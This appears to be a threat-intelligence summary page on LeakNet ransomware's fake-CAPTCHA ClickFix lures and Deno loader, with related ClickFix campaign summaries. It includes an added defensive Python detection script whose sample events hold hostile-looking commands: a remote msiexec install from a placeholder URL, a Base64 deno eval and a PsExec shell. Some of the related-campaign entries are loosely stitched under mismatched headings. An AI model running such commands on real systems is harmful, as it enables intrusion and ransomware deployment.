
LeakNet ransomware expands operations with ClickFix social engineering and Deno-based in-memory execution

2 unique sources, 2 articles

Summary


LeakNet ransomware has expanded its operations by adopting the ClickFix social engineering tactic delivered through compromised websites, which instruct users to run malicious 'msiexec.exe' commands via fake CAPTCHA checks. The group continues to deploy a Deno-based in-memory loader to execute Base64-encoded JavaScript payloads, fingerprint systems, and stage follow-on malware via polling loops, while maintaining a consistent post-exploitation chain involving DLL sideloading, credential discovery via 'klist', lateral movement via PsExec, and data staging using compromised Amazon S3 buckets. LeakNet first emerged in November 2024, presenting itself as a 'digital watchdog' focused on internet freedom and transparency, and has targeted industrial entities according to Dragos. The group’s shift away from initial access brokers reduces per-victim costs and operational bottlenecks. ReliaQuest also observed a separate intrusion attempt using Microsoft Teams-based phishing leading to a Deno-based loader, suggesting either a broadening of LeakNet’s tactics or adoption by other actors. The operation’s average of three monthly victims may increase as the group scales its new initial access and execution methods.

Timeline

  1. 17.03.2026 14:09 · 2 articles

    LeakNet ransomware leverages ClickFix and Deno runtime for stealthy, in-memory attacks

    New details clarify the ClickFix delivery mechanism via compromised legitimate websites serving fake CAPTCHA verification checks that instruct users to copy and paste malicious 'msiexec.exe' commands into the Windows Run dialog. The Deno-based loader now includes Base64-encoded JavaScript execution in memory, system fingerprinting, and a polling loop to repeatedly fetch and execute additional stages via Deno. A separate intrusion attempt using Microsoft Teams-based phishing to socially engineer a user into launching a payload chain ending in a Deno-based loader was observed, suggesting a potential broadening of initial access vectors either for LeakNet or other actors. LeakNet’s post-exploitation remains consistent: credential discovery via 'klist', DLL sideloading (jli.dll), lateral movement via PsExec, and data staging/exfiltration using compromised Amazon S3 buckets. The group first emerged in November 2024, presenting itself as a 'digital watchdog,' and has targeted industrial entities according to Dragos data. The shift away from initial access brokers reduces dependence on third-party suppliers and lowers per-victim acquisition costs.
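The chain described in this entry (fake CAPTCHA page, a pasted msiexec.exe command, a Deno loader evaluating Base64-encoded JavaScript in memory, then klist and PsExec) lends itself to a simple per-host correlation over process-creation telemetry. The following is an added example written for this page, not code from the article's sources or from any vendor named here. The event field names (`host`, `parent_image`, `image`, `command_line`), the sample events, and the individual heuristics (explorer.exe as parent of msiexec.exe with a URL argument, a long Base64 run passed to `deno eval`) are assumptions chosen for illustration; klist on its own is ordinary administrative activity, so it is only counted when a loader stage was already seen on the same host.

```python
"""Heuristic detection of a ClickFix -> Deno loader -> post-exploitation
chain over constructed process-creation events.  Added example, not code
from the page or any vendor it cites; field names and heuristics are
assumptions chosen for illustration."""
import re
from collections import defaultdict

# A run of >= 40 Base64-alphabet characters, used as a rough (assumed)
# signal for an inline Base64-encoded payload in a command line.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
URL = re.compile(r"https?://", re.IGNORECASE)

# Constructed sample events (not real telemetry).  ws-01 shows the full
# chain from the write-up; ws-02 shows only ordinary activity.
SAMPLE_EVENTS = [
    {"host": "ws-01", "parent_image": "explorer.exe", "image": "msiexec.exe",
     "command_line": "msiexec.exe /i http://example.invalid/pkg.msi"},
    {"host": "ws-01", "parent_image": "msiexec.exe", "image": "deno.exe",
     "command_line": "deno.exe eval " + "QUJD" * 15},
    {"host": "ws-01", "parent_image": "deno.exe", "image": "klist.exe",
     "command_line": "klist"},
    {"host": "ws-01", "parent_image": "cmd.exe", "image": "psexec.exe",
     "command_line": r"psexec.exe \\srv-02 -s cmd.exe"},
    {"host": "ws-02", "parent_image": "services.exe", "image": "msiexec.exe",
     "command_line": "msiexec.exe /V"},          # normal service-mode launch
    {"host": "ws-02", "parent_image": "cmd.exe", "image": "klist.exe",
     "command_line": "klist"},                   # admin checking tickets
]


def classify(event):
    """Map one process-creation event to a stage name, or None if benign."""
    image = event["image"].lower()
    parent = event["parent_image"].lower()
    cmd = event["command_line"]
    # Stage 1: msiexec started under explorer.exe (parent of the Run
    # dialog) with a remote package URL, the ClickFix pattern.
    if image == "msiexec.exe" and parent == "explorer.exe" and URL.search(cmd):
        return "initial_access_msiexec"
    # Stage 2: Deno runtime asked to evaluate an inline Base64 blob.
    if image == "deno.exe" and "eval" in cmd.lower() and B64_BLOB.search(cmd):
        return "inmemory_deno_loader"
    # Stage 3: Kerberos ticket enumeration via klist.
    if image == "klist.exe":
        return "credential_discovery_klist"
    # Stage 4: PsExec lateral movement.
    if image in ("psexec.exe", "psexec64.exe"):
        return "lateral_movement_psexec"
    return None


def detect_chain(events):
    """Collect stage hits per host, in event order, and score each host.

    klist only counts once a loader stage (stage 1 or 2) has already been
    seen on the same host, to avoid flagging routine admin use.
    """
    stages = defaultdict(list)
    for ev in events:
        stage = classify(ev)
        if stage is None:
            continue
        host = ev["host"]
        if stage == "credential_discovery_klist" and not any(
                s.startswith(("initial_access", "inmemory")) for s in stages[host]):
            continue
        stages[host].append(stage)
    return {host: {"stages": seen, "score": len(seen)}
            for host, seen in stages.items() if seen}


if __name__ == "__main__":
    for host, result in detect_chain(SAMPLE_EVENTS).items():
        print(host, result)
```

Running the block reports only ws-01, with all four stages and a score of 4; ws-02 produces nothing because its msiexec launch has no URL and its klist has no preceding loader stage. In practice the stage list would feed a case rather than a single alert, since each heuristic on its own is noisy.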



Similar Happenings

AI-Enabled Supply Chain Attacks Surge 156% in 2024

AI-enabled supply chain attacks have surged 156% in the past year, with sophisticated malware exhibiting polymorphic, context-aware, and semantically camouflaged characteristics. Real-world attacks, such as the 3CX breach affecting 600,000 companies and the NullBulge Group's weaponization of Hugging Face and GitHub repositories, highlight the increasing threat. Traditional security tools struggle against these adaptive threats, necessitating new defensive strategies and regulatory compliance measures. The EU AI Act imposes stringent penalties for violations, emphasizing the need for organizations to adopt AI-aware security measures and implement immediate action plans to mitigate risks.

COLDRIVER APT Group Uses ClickFix Tactics to Deliver BAITSWITCH and SIMPLEFIX Malware

The COLDRIVER APT group, also known as Star Blizzard, has intensified its operations since May 2025, rapidly developing and refining its malware arsenal. The group has launched a new campaign using ClickFix tactics to deliver three new malware families: NOROBOT, YESROBOT, and MAYBEROBOT. These malware families are connected via a delivery chain and target individuals and organizations connected to Russia, including NGOs, human rights defenders, and think tanks. The attack chain involves tricking victims into running a malicious DLL via a fake CAPTCHA check, leading to the deployment of the SIMPLEFIX backdoor. The malware exfiltrates specific file types and establishes communication with a command-and-control server. The campaign aligns with COLDRIVER's known victimology, focusing on civil society members connected to Russia. The group has been active since 2019, using spear-phishing and custom tools like SPICA and LOSTKEYS. The latest campaign demonstrates the group's continued use of effective infection vectors, despite their lack of technical sophistication. The malware families NOROBOT and MAYBEROBOT are tracked by Zscaler ThreatLabz under the names BAITSWITCH and SIMPLEFIX, respectively. The COLDRIVER group has been deploying the new malware set more aggressively than any previous campaigns. The new malware set replaces the previous primary malware LOSTKEYS, which has not been observed since its public disclosure in May 2025. The attack starts with a 'ClickFix-style' phishing lure, a fake CAPTCHA page designed to trick the victim into thinking they must verify they’re 'not a robot'. The malware uses a split-key cryptography scheme, with parts of the decryption key hidden in downloaded files and the Windows Registry. The malware fetches a self-extracting Python 3.8 installer, two encrypted Python scripts, and a scheduled task to ensure persistence. The Python scripts are combined to decrypt and launch a minimal Python-based first-stage backdoor that communicates with a hardcoded command-and-control (C2) server. The COLDRIVER group abandoned YESROBOT after just two weeks due to its cumbersome and easily detectable nature. The COLDRIVER group switched to MAYBEROBOT, a more flexible PowerShell-based backdoor, around June 2025. MAYBEROBOT uses a custom C2 protocol with commands to download and execute files, run commands via cmd.exe, and execute PowerShell blocks. The COLDRIVER group has been constantly evolving the NOROBOT malware to evade detection systems. The group has been using the NOROBOT and MAYBEROBOT malware families on targets previously compromised through phishing to acquire additional intelligence value from information on their devices directly.

The PhantomCaptcha campaign targeted Ukrainian regional government administration and organizations critical for the war relief effort, including the International Committee of the Red Cross, UNICEF, and various NGOs. The campaign began on October 8, 2025, and used a malicious "I am not a robot" CAPTCHA challenge to execute a PowerShell command, installing malware on victims' systems. The malware operated in three stages: a downloader script, a reconnaissance module, and a WebSocket-based RAT. The campaign's infrastructure was active for just one day, with backend servers remaining online to manage infected devices. The PhantomCaptcha campaign is linked to a wider operation involving malicious Android apps disguised as adult entertainment or cloud storage services.

The latest incidents were reported in May and June 2025 by two organizations, including Reporters Without Borders (RSF). The group is known for impersonating trusted contacts and prompting targets to request missing or malfunctioning attachments. In one case involving RSF in March 2025, a ProtonMail address mimicking a legitimate contact sent a French-language email asking a core member to review a document. No file was attached. When the member requested it, the operators replied in English with a link routed through a compromised website to a ProtonDrive URL. However, the file itself could not be retrieved because ProtonMail had blocked the associated account. A second victim received a file labeled as a PDF that was actually a ZIP archive disguised with a .pdf extension. The final stage of the attack used a typical Calisto decoy PDF that claimed to be encrypted and instructed the user to open it in ProtonDrive. The link again sent the target through a redirector hosted on a compromised website. The phishing kit analyzed by TDR, located on account.simpleasip[.]org, appeared to be custom built. It targeted ProtonMail accounts using an Adversary-in-the-Middle (AiTM) setup that relays two-factor authentication (2FA). Analysts found injected JavaScript designed to keep the cursor locked to the password field and to interact with an attacker-controlled API for handling CAPTCHA and 2FA prompts. Star Blizzard's infrastructure included servers hosting phishing pages and others serving as API endpoints. Many domains were tied to Namecheap services, while some earlier ones were registered via Regway, which helped analysts track the cluster over time.

UNC5518 Access-as-a-Service Campaign via ClickFix and Fake CAPTCHA Pages

Microsoft and Malwarebytes have disclosed a **DNS-based ClickFix variant** that marks the first documented use of the `nslookup` command to stage and deliver malicious payloads. This technique abuses DNS queries to retrieve a PowerShell script embedded in the `NAME:` field of a DNS response from an attacker-controlled server (**84[.]21.189[.]20**), which then deploys **ModeloRAT** via a Python runtime and VBScript persistence mechanism. The attack chain begins with fake CAPTCHA lures, followed by social engineering tactics (e.g., fake system alerts, browser crashes, or instructional videos) to coerce victims into executing the `nslookup` command, which downloads a ZIP archive containing the final payload. This evolution builds on earlier ClickFix tactics, including **ConsentFix** (Azure CLI OAuth abuse), **CrashFix** (malicious Chrome extensions triggering browser crashes), and **SyncAppvPublishingServer.vbs** (Google Calendar dead drops). The latest DNS-based approach demonstrates the campaign’s adaptability, leveraging **trusted native tools** (`nslookup`), **DNS as a C2 channel**, and **psychological manipulation** (urgency tactics) to bypass security controls. Concurrently, ClickFix campaigns continue to expand with **cross-platform targeting** (Windows/Linux/macOS), **AI platform abuse** (ChatGPT, Grok, Claude), and **weaponized SaaS infrastructure** (Google Groups, Pastebin) to distribute payloads like **Lumma Stealer** and **Odyssey Stealer**. The integration of **DNS staging**, **browser-native execution**, and **multi-stage loaders** underscores the campaign’s resilience despite 2025 law enforcement disruptions, with actors refining tradecraft to maximize evasion via **social engineering**, **steganography**, and **legitimate service abuse**.